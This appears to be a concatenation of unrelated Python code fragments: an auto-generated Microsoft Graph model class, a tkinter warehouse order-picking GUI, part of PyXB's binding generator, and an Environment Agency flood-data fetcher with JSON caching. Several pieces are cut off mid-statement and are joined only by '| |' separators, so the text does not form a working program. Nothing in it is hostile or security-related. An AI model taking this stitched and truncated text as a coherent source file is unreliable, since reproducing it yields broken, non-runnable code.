"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'participants': {'key': 'participants', 'type': '[str]'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PathsKpvac3CommunicationsCallsCallIdParticipantsMicrosoftGraphMuteallPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.participants = kwargs.get('participants', None)
self.client_context = kwargs.get('client_context', | |
# tkinter GUI library
import tkinter as tk
# date time library used for clock and time durations
from datetime import datetime, timedelta
# xml parser
from xml.dom import minidom
from xml.etree import ElementTree
# Python Imaging Library
from PIL import ImageTk, Image
# communication library used for all network activity
from lib import NetworkComms
# common ui elements
from lib import UICommon
# Config global variables
from lib import Config
# object classes
from lib import Objects
class Orders():
comms = NetworkComms.Communication()
uicommon = UICommon.UICommon()
click_start_time = datetime.now() # used for detecting a click or scroll
cursor_start_position = 0
order_array = [] # stores the list of orders
items_array = [] # stores the items within a single order
current_order = Objects.objOrder()
current_item = Objects.objOrderItem()
root_frame = None
parent_frame = None # the scroll frame
itemlist_frame = None # used within the order details frame to list items
true_image = None # used for the item pick status
false_image = None # used for the item pick status
def __init__(self, root, master):
#
# Initialise the orders class
#
self.root_frame = root
self.parent_frame = master
self.uicommon.root_frame = self.root_frame
self.true_image = ImageTk.PhotoImage(Image.open(self.uicommon.system_path + "true.bmp"))
self.false_image = ImageTk.PhotoImage(Image.open(self.uicommon.system_path + "false.bmp"))
def process_barcode(self, barcode, frame=None):
#
# trim the first two numbers and the last number from the order barcode and convert it into an integer
#
if (frame != None):
self.parent_frame = frame
code = barcode[2:]
order_id = int(code[:-1])
# get the order details
self.__order_details(order_id)
return
def process_product_barcode(self, barcode, frame=None):
#
# search the items array for the product barcode
#
if (frame != None):
self.parent_frame = frame
found = False
for i in self.items_array:
if (i.barcode == barcode):
self.current_item = i
self.__item_quantity_changed(i.picked + 1)
found = True
break
if (found == False):
self.uicommon.message_box(self.root_frame, "Not Found", "The barcode does not\n match any of the\n ordered items.")
return
def orders_list(self, frame):
#
# Fetches and displays a list of the current orders
#
self.parent_frame = frame
# set the scanning mode to default
Config.scanning_mode = 0
# clear the contents of the parent frame
self.uicommon.clear_frame(self.parent_frame)
# get the xml order list from the server and check that xml data was received
order_data = self.comms.get_order_list()
if (order_data != None):
# parse the xml string and get a list of the orders
xml_doc = ElementTree.fromstring(order_data)
xml_orders_list = xml_doc.findall("order")
print(str(len(xml_orders_list)) + " orders")
self.order_array.clear()
# loop through the orders
for s in xml_orders_list:
obj = Objects.objOrder()
obj.id = int(s.find("id").text)
obj.date = datetime.strptime(s.find("date").text, '%Y-%m-%dT%H:%M:%S')
obj.country = s.find("country").text
obj.name = s.find("name").text
obj.status = s.find("status").text
obj.total = float(s.find("total").text)
self.order_array.append(obj)
# build the table
index = 0
for i in self.order_array: #Rows
# set the colour for the first cell to show the status of the order
colour = "#ffffff"
if (str(i.status) == "Quotation"):
colour = "#b4c6e7"
elif (str(i.status) == "Payment Error"):
colour = "#8497b0"
elif (str(i.status) == "Order Saved"):
colour = "#fff600"
elif (str(i.status) == "Payment Pending"):
colour = "#00b0f0"
elif (str(i.status) == "Card Payment Pending"):
colour = "#00b0f0"
elif (str(i.status) == "Account Pending"):
colour = "#00b0f0"
elif (str(i.status) == "Cheque Pending"):
colour = "#00b0f0"
elif (str(i.status) == "Payment Received"):
colour = "#00cc00"
elif (str(i.status) == "Below Min Qty"):
colour = "#9bc2e6"
elif (str(i.status) == "Age Verification"):
colour = "#ff0000"
elif (str(i.status) == "Awaiting Stock"):
colour = "#bf8f00"
elif (str(i.status) == "Being Processed"):
colour = "#ffc000"
elif (str(i.status) == "Awaiting Dispatch"):
colour = "#57006d"
ordercolourcell = tk.Label(frame, text=" ", background=colour, padx=5, pady=10)
ordercolourcell.grid(row=index, column=0, sticky=tk.N+tk.S+tk.E+tk.W)
orderidcell = self.uicommon.table_cell(frame, str(i.id), justify=tk.CENTER, row=index, column=1)
self.uicommon.bind_children(orderidcell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(orderidcell, '<ButtonRelease-1>', lambda event, arg1=i.id: self.__orders_list_click(event, arg1))
t = datetime.strftime(i.date, "%d/%m/%y")
orderdatecell = self.uicommon.table_cell(frame, t, row=index, column=2)
self.uicommon.bind_children(orderdatecell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(orderdatecell, '<ButtonRelease-1>', lambda event, arg1=i.id: self.__orders_list_click(arg1))
ordertextcell = self.uicommon.table_cell(frame, str(i.name) + "\n" + str(i.country), row=index, column=3)
self.uicommon.bind_children(ordertextcell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(ordertextcell, '<ButtonRelease-1>', lambda event, arg1=i.id: self.__orders_list_click(arg1))
ordertotalcell = self.uicommon.table_cell(frame, str(i.total), justify=tk.RIGHT, row=index, column=4)
self.uicommon.bind_children(ordertotalcell, '<ButtonPress-1>', self.__row_pressed)
self.uicommon.bind_children(ordertotalcell, '<ButtonRelease-1>', lambda event, arg1=i.id: self.__orders_list_click(arg1))
index+=1
# configure the column weights
self.uicommon.table_column_weighs(frame, [5, 4, 2, 1, 3], [5,60,80,120,60])
else:
# Data could not be retrieved from the server so show an error message
self.uicommon.message_box(self.root_frame, "Communication Error", "The order list could not be retrieved from the server")
return
def __orders_list_click(self, selected_id):
#
# check if the mouse has been moved more than 5 pixels
#
x = self.root_frame.winfo_pointery() - self.cursor_start_position
if (x > -5) and (x < 5): # mouse has moved less than 5 pixels so detect it as a click
# check the amount of time that has passed since the press started
duration = datetime.now() - self.click_start_time
if (duration < timedelta(seconds=1)): # less than 1 second has passed so detect as click instead of hold
self.__order_details(selected_id)
return
    def __order_details(self, order_id):
        """Fetch order *order_id* from the server and rebuild the details view.

        Sets Config.scanning_mode to 1, replaces ``current_order`` and
        ``items_array`` from the returned XML, then repopulates
        ``parent_frame`` with an overview grid, a Save button, and the
        item list table.
        """
        #
        # set the scanning mode to be 1: Orders
        #
        Config.scanning_mode = 1 # orders mode
        # get the xml order list from the server
        order_data = self.comms.get_order_details(order_id)
        # NOTE(review): unlike orders_list, a None response is not checked
        # here; ElementTree.fromstring would raise on a failed fetch — confirm
        # this is intended.
        # parse the xml string and get a list of the orders
        xml_doc = ElementTree.fromstring(order_data)
        xml_order_overview = xml_doc.findall("order")
        xml_item_list = xml_doc.findall("item")
        print(str(len(xml_item_list)) + " items")
        self.items_array.clear()
        # get the order overview information
        for s in xml_order_overview:
            self.current_order.id = int(s.find("id").text)
            self.current_order.date = datetime.strptime(s.find("date").text, '%Y-%m-%dT%H:%M:%S')
            self.current_order.country = s.find("country").text
            self.current_order.name = s.find("name").text
            self.current_order.status = s.find("status").text
            self.current_order.total = float(s.find("total").text)
        print("Current Order: " + str(self.current_order.id))
        # loop through the order items
        for s in xml_item_list:
            obj = Objects.objOrderItem()
            obj.orderid = self.current_order.id
            obj.productref = s.find("productref").text
            obj.productname = s.find("productname").text
            obj.quantity = int(s.find("quantity").text)
            obj.unitprice = float(s.find("unitprice").text)
            obj.barcode = s.find("barcode").text
            print(obj.productname)
            self.items_array.append(obj)
        # clear any existing elements from the parent frame
        self.uicommon.clear_frame(self.parent_frame)
        # build the overview frame
        overview_frame = tk.Frame(self.parent_frame, width=320)
        overview_frame.pack()
        id_title_label = self.uicommon.table_title(overview_frame, "Order ID:", row=0, column=0)
        id_label = self.uicommon.table_cell(overview_frame, str(self.current_order.id), row=0, column=1)
        date_title_label = self.uicommon.table_title(overview_frame, "Date:", row=1, column=0)
        date_label = self.uicommon.table_cell(overview_frame, str(self.current_order.date), row=1, column=1, columnspan=2)
        name_title_label = self.uicommon.table_title(overview_frame, "Name:", row=2, column=0)
        name_label = self.uicommon.table_cell(overview_frame, str(self.current_order.name), row=2, column=1, columnspan=2)
        country_title_label = self.uicommon.table_title(overview_frame, "Country:", row=3, column=0)
        country_label = self.uicommon.table_cell(overview_frame, str(self.current_order.country), row=3, column=1, columnspan=2)
        status_title_label = self.uicommon.table_title(overview_frame, "Status:", row=4, column=0)
        status_label = self.uicommon.table_cell(overview_frame, str(self.current_order.status), row=4, column=1, columnspan=2)
        # save button
        save_button = tk.Button(overview_frame, width=120, font="DejaVuSans 30 normal", foreground="white",pady=5, activeforeground="white", background="#588706",activebackground="#4b7206", text="Save", command=self.__save_order)
        save_button.grid(row=0, column=2)
        # set the column weights and widths
        self.uicommon.table_column_weighs(overview_frame, [3, 1, 2], [80, 120, 120])
        self.itemlist_frame = tk.Frame(self.parent_frame, width=320)
        self.itemlist_frame.pack()
        # build the table frame
        self.__item_list_table()
        return
    def __item_list_table(self):
        """Rebuild the item table inside ``itemlist_frame`` from ``items_array``.

        The Picked column shows the false/true image when the item is fully
        unpicked/picked, or the partial count as text otherwise; releasing a
        press on that cell routes to ``__item_click``.
        """
        #
        # clear the contents of the item list table
        #
        self.uicommon.clear_frame(self.itemlist_frame)
        index = 1
        # add the titles
        product_title = self.uicommon.table_title(self.itemlist_frame, "Product ID/Name", row=0, column=0)
        quantity_title = self.uicommon.table_title(self.itemlist_frame, "Qty", row=0, column=1)
        picked_title = self.uicommon.table_title(self.itemlist_frame, "Picked", row=0, column=2)
        # add the contents of the items_array to the table
        for i in self.items_array:
            product_cell = self.uicommon.table_cell(self.itemlist_frame, i.productref + "\n" + i.productname, row=index, column=0)
            quanitity_cell = self.uicommon.table_cell(self.itemlist_frame, i.quantity, row=index, column=1)
            if (i.picked == 0):
                picked_cell = self.uicommon.table_cell(self.itemlist_frame, image=self.false_image, row=index, column=2)
            elif(i.picked == i.quantity):
                picked_cell = self.uicommon.table_cell(self.itemlist_frame, image=self.true_image, row=index, column=2)
            else:
                # partially picked: show the numeric count instead of an icon
                picked_cell = self.uicommon.table_cell(self.itemlist_frame, image=None, celltext=str(i.picked), row=index, column=2)
            self.uicommon.bind_children(picked_cell, '<ButtonPress-1>', self.__row_pressed)
            self.uicommon.bind_children(picked_cell, '<ButtonRelease-1>', lambda event, arg1=i: self.__item_click(arg1))
            index+= 1
        # NOTE(review): the weights list has 2 entries but 3 widths/columns,
        # unlike orders_list which passes matching lengths — confirm
        # table_column_weighs tolerates the short list.
        self.uicommon.table_column_weighs(self.itemlist_frame, [1, 2], [210, 40, 40])
def __item_click(self, selected_item):
#
# Checks if a click is valid and then updates the picked quanitity
#
# check if the mouse has been moved more than 5 pixels
x = self.root_frame.winfo_pointery() - self.cursor_start_position
if (x > -5) and (x < 5): # mouse has moved less than 5 pixels so detect it as a click
# check the amount of time that has passed since the press started
duration = datetime.now() - self.click_start_time
if (duration < timedelta(seconds=1)): # less than 1 second has passed so detect as click instead of hold
self.current_item = selected_item
# if selected item has already been picked reset it to be unpicked
if (selected_item.picked == selected_item.quantity):
selected_item.picked = 0
self.__items_array_update(selected_item)
self.__item_list_table()
elif(selected_item.quantity == 1):
# get the quantity for the selected item. If the quanitity is 1 update | |
declarations are reserved within the binding
%{namespace_decls}
''', **template_map))
def _moduleUID_vx (self):
    """Return a stable UID: the sorted namespace identifiers joined by ';'.

    Absent namespaces contribute the literal text 'Absent'.
    """
    names = []
    for nsm in self.namespaceModules():
        ns = nsm.namespace()
        names.append('Absent' if ns.isAbsentNamespace() else six.text_type(ns))
    names.sort()
    return six.u(';').join(names)
def __str__ (self):
    """Short human-readable tag identifying this namespace group module."""
    path = self.modulePath()
    return 'NGM:%s' % (path,)
def GeneratePython (schema_location=None,
                    schema_text=None,
                    namespace=None,
                    module_prefix_elts=(),
                    **kw):
    """Generate Python binding source for a single schema, in memory.

    @keyword schema_location: location of the entrypoint schema; takes
        precedence over C{schema_text}
    @keyword schema_text: the schema document text, used only when no
        location is given
    @keyword namespace: used only in the diagnostic emitted when generation
        does not produce exactly one module
    @keyword module_prefix_elts: unused by this function; retained for
        backward compatibility.  The default was changed from a shared
        mutable C{[]} to an immutable tuple to remove the mutable-default
        hazard.
    @return: the generated binding module contents as text
    """
    generator = Generator(allow_absent_module=True, generate_to_files=False, **kw)
    if schema_location is not None:
        generator.addSchemaLocation(schema_location)
    elif schema_text is not None:
        generator.addSchema(schema_text)
    modules = generator.bindingModules()
    assert 1 == len(modules), '%s produced %d modules: %s' % (namespace, len(modules), six.u(' ').join([six.text_type(_m) for _m in modules]))
    return modules.pop().moduleContents()
import optparse
import re
class Generator (object):
"""Configuration and data for a single binding-generation action."""
# Default root: write bindings into the current working directory.
_DEFAULT_bindingRoot = '.'
def bindingRoot (self):
    """The directory path into which generated bindings will be written.
    See L{setBindingRoot}.
    @rtype: C{str}"""
    return self.__bindingRoot
def setBindingRoot (self, binding_root):
    """Set the directory into which generated bindings are written.
    @return: C{self} for call chaining"""
    self.__bindingRoot = binding_root
    return self
# Class-level default for the instance attribute.
__bindingRoot = None
def __moduleFilePath (self, module_elts, inhibit_extension=False):
    """Map a dotted module name (or element sequence) to a file path
    under L{bindingRoot}.

    Unless C{inhibit_extension} is set, a C{.py} suffix is appended to the
    final element.  The caller's sequence is never modified.
    """
    if isinstance(module_elts, six.string_types):
        elts = module_elts.split('.')
    else:
        elts = list(module_elts)
    assert 0 < len(elts)
    if not inhibit_extension:
        assert not elts[-1].endswith('.py')
        elts[-1] += '.py'
    return os.path.join(self.bindingRoot(), *elts)
def generateToFiles (self):
    """Whether generated bindings are written to files (as opposed to
    being returned in memory).
    @rtype: C{bool}"""
    return self.__generateToFiles
# Class-level default for the instance attribute.
__generateToFiles = None
def modulePathData (self, module):
    """Determine where the bindings for C{module} should be written.

    @param module: a L{NamespaceModule} or L{NamespaceGroupModule}
    @return: a tuple C{(binding_file_path, binding_file, module_path)}:
        the file-system path to which bindings are written, the open file
        object for them, and the dotted module path from which they are
        normally imported.  Namespace modules that should not be generated
        yield C{('/dev/null', None, None)}.
    @raise pyxb.BindingGenerationError: if a target file already exists
        with other content, or a namespace group is generated without
        generate-to-files.
    """
    # file system path to where the bindings are written
    # module path from which the bindings are normally imported
    # file object into which bindings are written
    module_path = None
    if isinstance(module, NamespaceModule):
        mr = module.moduleRecord()
        # Skip generation for: unrecorded modules, modules from another
        # generation run, purely in-memory generation, and builtin
        # namespaces unless explicitly allowed.
        if mr is None:
            return ('/dev/null', None, None)
        if self.generationUID() != mr.generationUID():
            return ('/dev/null', None, None)
        if not self.generateToFiles():
            return ('/dev/null', None, None)
        if mr.namespace().isBuiltinNamespace() and (not self.allowBuiltinGeneration()):
            return ('/dev/null', None, None)
        module_path = mr.modulePath()
        assert module_path is not None, 'No path specified for module %s' % (mr,)
        #if pyxb.namespace.XMLSchema != ns:
        #    return ('/dev/null', None, None)
        #module_path="bogus.xsd"
        module_elts = module_path.split('.')
        if self.writeForCustomization():
            # Bindings go into a 'raw' subpackage; a customization stub
            # re-exporting them is created at the import path only when no
            # file exists there yet, so user edits are preserved.
            import_file_path = self.__moduleFilePath(module_elts)
            module_elts.insert(-1, 'raw')
            if not os.path.exists(import_file_path):
                raw_module_path = '.'.join(module_elts)
                fd = pyxb.utils.utility.OpenOrCreate(import_file_path)
                impt = '''# -*- coding: utf-8 -*-
from %s import *
''' % (raw_module_path,)
                impd = impt.encode('utf-8')
                fd.write(impd)
                fd.close()
        binding_file_path = self.__moduleFilePath(module_elts)
        try:
            binding_file = pyxb.utils.utility.OpenOrCreate(binding_file_path, tag=module.moduleUID())
        except OSError as e:
            # EEXIST from OpenOrCreate means the file holds content tagged
            # with a different UID: refuse to clobber it.
            if errno.EEXIST == e.errno:
                raise pyxb.BindingGenerationError('Target file %s for module %s bindings exists with other content' % (binding_file_path, mr))
            raise
    elif isinstance(module, NamespaceGroupModule):
        if not self.generateToFiles():
            raise pyxb.BindingGenerationError('Generation of namespace groups requires generate-to-files')
        module_elts = []
        if self.modulePrefix():
            module_elts.extend(self.modulePrefix().split('.'))
        if self.writeForCustomization():
            module_elts.append('raw')
        # Probe candidate 'nsgroupN' names until one can be opened/created
        # for this group's UID; EEXIST means the candidate belongs to a
        # different group, so drop it and try the next identifier.
        in_use = set()
        while True:
            module_elts.append(pyxb.utils.utility.PrepareIdentifier('nsgroup', in_use, protected=True))
            try:
                binding_file_path = self.__moduleFilePath(module_elts)
                _log.info('Attempting group %s uid %s at %s', module, module.moduleUID(), binding_file_path)
                binding_file = pyxb.utils.utility.OpenOrCreate(binding_file_path, tag=module.moduleUID())
                break
            except OSError as e:
                if errno.EEXIST != e.errno:
                    raise
            module_elts.pop()
        module_path = '.'.join(module_elts)
    else:
        assert False
    if self.generateToFiles():
        # Ensure every package directory on the module path is importable.
        for n in range(len(module_elts)-1):
            sub_path = self.__moduleFilePath(module_elts[:1+n], inhibit_extension=True)
            init_path = os.path.join(sub_path, '__init__.py')
            if not os.path.exists(init_path):
                # NOTE(review): file handle is not closed explicitly;
                # relies on interpreter cleanup.
                open(init_path, 'w')
    return (binding_file_path, binding_file, module_path)
def schemaRoot (self):
    """The directory from which entrypoint schemas specified as
    relative file paths will be read.
    L{setSchemaRoot} guarantees the value ends with C{os.sep}.
    @rtype: C{str}"""
    return self.__schemaRoot
def setSchemaRoot (self, schema_root):
    """Set the directory used to resolve relative entrypoint schema
    paths, guaranteeing a trailing path separator.
    @return: C{self} for call chaining"""
    if schema_root.endswith(os.sep):
        self.__schemaRoot = schema_root
    else:
        self.__schemaRoot = schema_root + os.sep
    return self
__schemaRoot = None
def schemaStrippedPrefix (self):
    """Optional string that is stripped from the beginning of
    schemaLocation values before loading from them.
    This applies only to the values of schemaLocation attributes
    in C{import} and C{include} elements.  Its purpose is to
    convert absolute schema locations into relative ones to allow
    offline processing when all schema are available in a local
    directory.  See C{schemaRoot}.
    @rtype: C{str} or C{None}
    """
    return self.__schemaStrippedPrefix
def setSchemaStrippedPrefix (self, schema_stripped_prefix):
    """Set the prefix stripped from schemaLocation values.
    @return: C{self} for call chaining"""
    self.__schemaStrippedPrefix = schema_stripped_prefix
    return self
# Class-level default for the instance attribute.
__schemaStrippedPrefix = None
def locationPrefixRewriteMap (self):
    """Optional map to rewrite schema locations.
    This applies only to the values of schemaLocation attributes
    in C{import} and C{include} elements.  Its purpose is to
    convert remote or absolute schema locations into local or
    relative ones to allow offline processing when all schema are
    available in a local directory.  See C{schemaRoot}.
    @rtype: C{dict}
    """
    # NOTE(review): this reads __locationPrefixRewriteMap (presumably
    # initialized in __init__, which is outside this view), while
    # setLocationPrefixRewriteMap updates the differently-named
    # class-level __locationPrefixMap -- confirm which is intended.
    return self.__locationPrefixRewriteMap
def setLocationPrefixRewriteMap (self, location_prefix_rewrite_map):
    """Replace the schema-location rewrite map.
    @return: C{self} for call chaining

    Fix: this previously updated C{__locationPrefixMap}, a class-level
    dict that neither L{locationPrefixRewriteMap} nor
    L{addLocationPrefixRewrite} consults, so the assigned map was
    silently ignored.  It now updates the same mapping the getter
    returns, in place.
    """
    self.__locationPrefixRewriteMap.clear()
    self.__locationPrefixRewriteMap.update(location_prefix_rewrite_map)
    return self
def addLocationPrefixRewrite (self, prefix, substituent):
    """Add a rewrite entry for schema locations.
    @param prefix : A text prefix that should be removed from
    schema location URIs.
    @param substituent : The text prefix that should replace
    C{prefix} as a prefix in a schema location URI.
    @return: C{self} for call chaining
    """
    self.__locationPrefixRewriteMap[prefix] = substituent
    return self
def argAddLocationPrefixRewrite (self, prefix_rewrite):
    """Add a rewrite entry for schema locations.
    Parameter values are strings of the form C{pfx=sub}.  The
    effect is that a schema location that begins with C{pfx} is
    rewritten so that it instead begins with C{sub}.
    @raise ValueError: if the argument does not contain C{=}
    """
    try:
        (prefix, substituent) = prefix_rewrite.split('=', 1)
    except ValueError:
        # Previously a bare "except: raise", which handled nothing and
        # explained nothing; name the bad input in the diagnostic.
        raise ValueError('prefix rewrite %r lacks the required "pfx=sub" form' % (prefix_rewrite,))
    self.addLocationPrefixRewrite(prefix, substituent)
__locationPrefixMap = {}
def schemaLocationList (self):
    """A list of locations from which entrypoint schemas are to be
    read.
    The values in the list are either URIs, or tuples consisting
    of a value and a callable which, when passed the generator
    object and the value, will return a
    L{pyxb.xmlschema.structures.Schema} instance.  See
    L{addSchemaLocation}.
    See also L{addSchemaLocation} and L{schemas}.
    @rtype: C{list}
    """
    return self.__schemaLocationList
def setSchemaLocationList (self, schema_location_list):
    """Replace the entrypoint schema locations.
    The existing internal list object is emptied and refilled in place.
    @return: C{self} for call chaining"""
    self.__schemaLocationList[:] = []
    self.__schemaLocationList.extend(schema_location_list)
    return self
def addSchemaLocation (self, schema_location, converter=None):
    """Add the location of an entrypoint schema.
    @param schema_location: The location of the schema.  This
    should be a URL; if the schema location does not have a URL
    scheme (e.g., C{http:}), it is assumed to be a file, and if it
    is not an absolute path is located relative to the
    C{schemaRoot}.
    @keyword converter: Optional callable that will be invoked
    with the generator instance and the schema location, and is
    expected to return a L{pyxb.xmlschema.structures.Schema}
    instance.  If absent, the contents of the location are
    converted directly.
    @note: The C{converter} argument derives from WSDL support: we
    need to add to the sequence of schema locations a URI of
    something that will not parse as a schema, but does have inner
    material that can if treated properly.  "Treated properly" may
    include having the archive path and other namespace
    manipulations configured before anything is done to it.
    @return: C{self} for call chaining
    """
    self.__schemaLocationList.append( (schema_location, converter) )
    return self
def argAddSchemaLocation (self, schema_location):
    """Add the location of an entrypoint schema.  The provided
    value should be a URL; if it does not have a URL scheme (e.g.,
    C{http:}), it is assumed to be a file, and if it is not an
    absolute path is located relative to the C{schemaRoot}.
    Unlike L{addSchemaLocation} this returns C{None} (not chainable)."""
    self.addSchemaLocation(schema_location)
# Class-level default for the instance attribute.
__schemaLocationList = None
def schemas (self):
    """Schema for which bindings should be generated.
    These may be L{Schema<pyxb.xmlschema.structures.Schema>}
    instances, or strings; the latter is preferred, and is parsed
    into a Schema instance when required.
    This is the list of entrypoint schemas for binding generation.
    Values in L{schemaLocationList} are read and converted into
    schema, then appended to this list.  Values from L{moduleList}
    are applied starting with the first schema in this list.
    @return: a shallow copy of the internal schema list
    """
    return self.__schemas[:]
def setSchemas (self, schemas):
    """Replace the entrypoint schemas, refilling the internal list in place.
    @return: C{self} for call chaining"""
    self.__schemas[:] = []
    self.__schemas.extend(schemas)
    return self
def addSchema (self, schema):
    """Append an entrypoint schema (instance or text); see L{schemas}.
    @return: C{self} for call chaining"""
    self.__schemas.append(schema)
    return self
# Class-level default for the instance attribute.
__schemas = None
def namespaces (self):
    """The set of L{namespaces<pyxb.namespace.Namespace>} for
    which bindings will be generated.
    This is the set of namespaces read from entrypoint schema,
    closed under reference to namespaces defined by schema import.
    A copy is returned; mutating it does not affect the generator.
    @rtype: C{set}
    """
    return self.__namespaces.copy()
def setNamespaces (self, namespace_set):
    """Replace the namespace set, refilling the internal set in place.
    @return: C{self} for call chaining"""
    self.__namespaces.clear()
    self.__namespaces.update(namespace_set)
    return self
def addNamespace (self, namespace):
    """Add a namespace to the set for which bindings are generated.
    @return: C{self} for call chaining"""
    self.__namespaces.add(namespace)
    return self
# Class-level default for the instance attribute.
__namespaces = None
def moduleList (self):
    """A list of module names to be applied in order to the namespaces of entrypoint schemas.
    A shallow copy is returned.
    @rtype: C{list}"""
    return self.__moduleList[:]
def _setModuleList (self, module_list):
    """Replace the module-name list, refilling the internal list in place.
    @return: C{self} for call chaining"""
    self.__moduleList[:] = []
    self.__moduleList.extend(module_list)
    return self
def addModuleName (self, module_name):
    """Add a module name corresponding to an entrypoint schema.
    The namespace defined by the corresponding schema will be
    written to a binding using the given module name, adjusted by
    L{modulePrefix}.
    @return: C{self} for call chaining"""
    self.__moduleList.append(module_name)
    return self
# Class-level default for the instance attribute.
__moduleList = None
def modulePrefix (self):
    """The prefix for binding modules.
    The base name for the module holding a binding is taken from
    the moduleList, moduleMap, or an XMLNS prefix associated with
    the namespace in a containing schema.  This value, if present,
    is used as a prefix to allow a deeper module hierarchy.
    @rtype: C{str} or C{None}"""
    return self.__modulePrefix
def setModulePrefix (self, module_prefix):
    """Set the prefix prepended to generated binding module names.
    @return: C{self} for call chaining"""
    self.__modulePrefix = module_prefix
    return self
# Class-level default for the instance attribute.
__modulePrefix = None
def namespaceModuleMap (self):
"""A map from namespace URIs to the module to be used for the
corresponding generated binding.
Module values are adjusted by L{modulePrefix} | |
'''
This module provides functionality for retrieving real-time and
latest time history level data
Reference:
https://environment.data.gov.uk/flood-monitoring/doc/reference
'''
# pylint: disable=assignment-from-no-return
import datetime
import json
import os
import warnings
import requests
import dateutil.parser
from typing import Union
try:
from .analysis import identify_potentially_bad_data
from .station import MonitoringStation, RainfallGauge
except ImportError:
from analysis import identify_potentially_bad_data
from station import MonitoringStation, RainfallGauge
def fetch(url: str, timeout: Union[float, None] = None) -> dict:
    '''
    Retrieve JSON data from a given API url.

    #### Arguments

    `url` (str): API url from which to fetch data

    `timeout` (float, default = None): optional timeout in seconds passed to
    `requests.get`; the default None preserves the previous behaviour of
    waiting indefinitely

    #### Returns

    dict: JSON response
    '''
    r = requests.get(url, timeout=timeout)
    return r.json()
def dump(data: dict, filename: str) -> None:
    '''
    Save JSON response to a file, nicely formatted.

    #### Arguments

    `data` (dict): JSON dict

    `filename` (str): save file location
    '''
    # context manager guarantees the handle is closed even if
    # serialisation fails; json.dump returns None so the old
    # `data = json.dump(...)` assignment was dropped
    with open(filename, 'w') as f:
        json.dump(data, f, indent=4)
def load(filename: str) -> dict:
    '''
    Loads JSON object from file.

    #### Arguments

    `filename` (str): JSON file to load from

    #### Returns

    dict: JSON dict
    '''
    # context manager guarantees the handle is closed even if parsing fails
    with open(filename, 'r') as f:
        return json.load(f)
def fetch_stationdata(use_cache: bool = True) -> tuple[dict, dict, dict]:
    '''
    Fetch data from Environment Agency for all active river level
    monitoring stations at once via a REST API and return retrieved data as a
    JSON object. Include tidal (coastal) stations separately.

    Fetched data is dumped to a cache file so on subsequent call it can
    optionally be retrieved from the cache file. This is faster than
    retrieval over the internet and avoids excessive calls to the
    Environment Agency service.

    #### Arguments

    `use_cache` (bool, default = True): whether to try fetching station data from a local cache

    #### Returns

    tuple[dict, dict, dict]: full JSON-formatted datasets for all river-level,
    tidal and groundwater stations, respectively
    '''
    # URL for retrieving data for active stations with river level monitoring
    # NOTE: '&parameter' restored here -- the query string previously
    # contained a mojibake pilcrow ('\u00b6meter') where '&parameter' belongs
    ROOT_URL = "http://environment.data.gov.uk/flood-monitoring/id/stations"
    API_STR = "?status=Active&parameter=level&_view=full"
    RIVER_ONLY = "&type=SingleLevel"
    COASTAL_ONLY = "&type=Coastal"
    GROUNDWATER_ONLY = "&type=Groundwater"
    url = ROOT_URL + API_STR

    # exist_ok=True replaces the old try/except FileExistsError dance
    CACHE_DIR = 'cache/data'
    os.makedirs(CACHE_DIR, exist_ok=True)
    river_cache_file = os.path.join(CACHE_DIR, 'station_data_river.json')
    coastal_cache_file = os.path.join(CACHE_DIR, 'station_data_coastal.json')
    groundwater_cache_file = os.path.join(CACHE_DIR, 'station_data_groundwater.json')

    # Attempt to load all river data from file, otherwise fetch over internet
    if use_cache:
        try:
            river_data = load(river_cache_file)
        except FileNotFoundError:
            river_data = fetch(url + RIVER_ONLY)
            dump(river_data, river_cache_file)
        try:
            coastal_data = load(coastal_cache_file)
        except FileNotFoundError:
            coastal_data = fetch(url + COASTAL_ONLY)
            dump(coastal_data, coastal_cache_file)
        try:
            groundwater_data = load(groundwater_cache_file)
        except FileNotFoundError:
            groundwater_data = fetch(url + GROUNDWATER_ONLY)
            dump(groundwater_data, groundwater_cache_file)
    else:
        # Fetch and dump to file
        river_data = fetch(url + RIVER_ONLY)
        dump(river_data, river_cache_file)
        coastal_data = fetch(url + COASTAL_ONLY)
        dump(coastal_data, coastal_cache_file)
        groundwater_data = fetch(url + GROUNDWATER_ONLY)
        dump(groundwater_data, groundwater_cache_file)

    return river_data, coastal_data, groundwater_data
def fetch_gauge_data(use_cache: bool = False) -> dict:
    '''
    Fetch data from Environment Agency for all active rainfall gauges
    at once via a REST API and return retrieved data as a JSON object.

    Fetched data is dumped to a cache file so on subsequent call it can
    optionally be retrieved from the cache file. This is faster than
    retrieval over the internet and avoids excessive calls to the
    Environment Agency service.

    #### Arguments

    `use_cache` (bool, default = False): whether to use the most recently stored data
    instead of fetching new data

    #### Returns

    dict: full JSON-formatted datasets for all gauges
    '''
    ROOT_URL = 'https://environment.data.gov.uk/flood-monitoring/id/'
    API_STR = 'stations?parameter=rainfall'
    url = ROOT_URL + API_STR

    # exist_ok=True replaces the old try/except FileExistsError dance
    CACHE_DIR = 'cache/data'
    os.makedirs(CACHE_DIR, exist_ok=True)
    cache_file = os.path.join(CACHE_DIR, 'rainfall_gauge_data.json')

    # Attempt to load gauge data from file, otherwise fetch over internet (slower)
    if use_cache:
        try:
            # Attempt to load from file
            rainfall_data = load(cache_file)
        except FileNotFoundError:
            rainfall_data = fetch(url)
            dump(rainfall_data, cache_file)
    else:
        rainfall_data = fetch(url)
        dump(rainfall_data, cache_file)

    return rainfall_data
def fetch_latest_water_level_data(use_cache: bool = False) -> dict:
    '''
    Fetch latest water levels from all measures (stations).

    #### Arguments

    `use_cache` (bool, default = False): whether to use the most recently stored data
    instead of fetching new data

    #### Returns

    dict: JSON-formatted datasets of latest data at each station
    '''
    # URL for retrieving data
    ROOT_URL = "http://environment.data.gov.uk/flood-monitoring/id/measures"
    API_STR = "?parameter=level"
    url = ROOT_URL + API_STR

    # exist_ok=True replaces the old try/except FileExistsError dance
    CACHE_DIR = 'cache/data'
    os.makedirs(CACHE_DIR, exist_ok=True)
    cache_file = os.path.join(CACHE_DIR, 'station_water_level_data.json')

    # Attempt to load level data from file, otherwise fetch over internet (slower)
    if use_cache:
        try:
            # Attempt to load from file
            level_data = load(cache_file)
        except FileNotFoundError:
            level_data = fetch(url)
            dump(level_data, cache_file)
    else:
